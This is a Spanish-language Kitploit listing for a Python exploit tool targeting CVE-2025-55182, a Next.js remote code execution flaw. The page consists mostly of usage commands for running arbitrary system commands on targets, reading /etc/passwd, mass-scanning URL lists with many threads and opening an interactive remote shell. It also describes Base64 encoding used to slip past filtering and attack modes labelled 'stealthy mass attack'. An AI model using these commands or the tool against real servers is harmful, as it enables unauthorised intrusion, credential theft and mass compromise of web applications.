Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-EXP — Exploit basado en Python para CVE-2025-55182 (RCE de Next.js) con escaneo de objetivos individuales/lotes, ejecución de comandos, shell interactivo y 4 modos de ataque con soporte de codificación Base64. | Kitploit
Herramientas/GitHubGitHub/lc-pro/cve-2025-55182-exp
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHublc-pro/cve-2025-55182-exp

CVE-2025-55182-EXP

Exploit basado en Python para CVE-2025-55182 (RCE de Next.js) con escaneo de objetivos individuales/lotes, ejecución de comandos, shell interactivo y 4 modos de ataque con soporte de codificación Base64.

Ver Repositorio
24hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Explotación para CVE-2025-55182

Introducción a la Herramienta

Esta herramienta está diseñada para detectar y explotar la vulnerabilidad CVE-2025-55182 (presumiblemente una vulnerabilidad de ejecución de código en un framework relacionado con Next.js). Admite detección masiva de un solo objetivo / múltiples objetivos, ejecución de comandos, shell interactiva y otras funciones. Proporciona 4 modos de ataque para adaptarse a diferentes escenarios, y admite configuración flexible como codificación Base64 de comandos, reenvío de proxy y salida de registros.

Descripción de la Vulnerabilidad

La vulnerabilidad CVE-2025-55182 puede existir en aplicaciones relacionadas con Next.js. Mediante la construcción de una solicitud maliciosa se modifica la lógica de ejecución en _response, inyectando la invocación del módulo child_process para lograr la ejecución remota de comandos (RCE). La herramienta envía datos de formulario especialmente diseñados para desencadenar la vulnerabilidad y devolver los resultados de la ejecución del comando.

Requisitos del Entorno

  • Python 3.7+
  • Dependencia: requests
  • Instalar dependencias:
    • pip install requests
      

Uso Básico

1. Ejecución de Comandos en un Solo Objetivo (Modo de Ataque Predeterminado)

# Ejecutar el comando whoami (Modo de ataque 1: con respuesta)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"

# Ejecutar comando del sistema (codificado en Base64 para evitar la interceptación de caracteres especiales)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b

# Modo de respuesta completa (decodifica el resultado devuelto en Base64)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4

2. Detección Masiva de Múltiples Objetivos

# Leer URLs de destino desde un archivo y ejecutar el comando id de forma masiva (20 hilos)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log

3. Modo Shell Interactivo

# Conectar al objetivo y entrar en una línea de comandos interactiva (soporta cambio de codificación Base64)
python CVE-2025-55182-exploit.py -u https://target.com -s

4. Modo Proxy (Captura de Paquetes / Reenvío de Tráfico)

# Capturar y analizar tráfico a través del proxy de Burp Suite
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080

Descripción de Parámetros

ParámetroAbrev.ObligatorioDescripciónEjemplo
--url-uNoURL de un solo objetivo (excluyente con -l, se prefiere -u)-u https://target.com
--url-list-lNoArchivo de lista de URLs objetivo (una URL por línea, sin protocolo se añade automáticamente http/https)-l urls.txt
--payload-pNoModo de ataque (por defecto: 1)
1=con respuesta(execSync)
2=sin respuesta(execSync)
3=sin respuesta(exec)
--cmd-cNoComando del sistema a ejecutar (obligatorio en modo por lotes/comando único, excluyente con -s)-c "whoami" o -c "dir"
--threads-tNoNúmero de hilos para detección masiva (por defecto: 10, se recomienda no más de 50)-t 20
--outlog-oNoArchivo de registro de salida (por defecto: cve-2025-55182.log)-o exploit.log
--base64-bNoCodifica en Base64 el comando especificado en -c (evita la interceptación de caracteres especiales)-c "cat /etc/passwd" -b
--cmd-shell-sNoModo shell interactivo (solo para objetivo único con -u, excluyente con -c)-u https://target.com -s
--proxy-NoConfiguración de proxy (soporta proxy HTTP/HTTPS para captura o reenvío de tráfico)--proxy http://127.0.0.1:8080
--skip-check-NoOmite la verificación de conectividad del proxy (por defecto se verifica la disponibilidad del proxy)--proxy http://127.0.0.1:8080 --skip-check
--time-out-NoTiempo de espera de solicitud (en segundos, por defecto: 10)--time-out 15

Detalles de los Modos de Ataque

Número de ModoDescripción del ModoCaracterísticasEscenario de Uso
1Con respuesta (execSync)Ejecuta el comando de forma síncrona, devuelve redirección 303, el resultado está en la cabecera de respuestaVerificación rápida de la vulnerabilidad
2Sin respuesta (execSync)Ejecuta el comando de forma síncrona, sin resultado devuelto (se debe confirmar por otros medios)Ejecución sigilosa
3Sin respuesta (exec)Ejecuta el comando de forma asíncrona, sin resultado devuelto (baja huella, adecuado para operaciones sin confirmación)Ataque masivo sigiloso
4Respuesta completaEjecuta el comando de forma síncrona, el resultado se devuelve codificado en Base64 en el cuerpo de la respuesta (la herramienta lo decodifica automáticamente)Escenarios que requieren ver la salida completa

Comandos del Shell Interactivo

Una vez en el modo -s, se admiten los siguientes comandos integrados:

ComandoDescripción
b64Cambiar al modo de comandos codificados en Base64
nob64Salir del modo de codificación Base64
exitSalir del shell interactivo
?Ver ayuda

Explicación de la Salida

  1. Salida en consola: incluye información clave como la hora de ejecución, URL objetivo, código de estado de respuesta, resultado del comando, etc.;
  2. Archivo de registro: todos los registros de ejecución (éxito/fracaso) se escriben automáticamente en el archivo especificado por --outlog para su posterior análisis;
  3. Lista de éxitos: después de la detección masiva, se resumen automáticamente los objetivos vulnerables (código de estado 303/500).

Notas Importantes

Descargar herramienta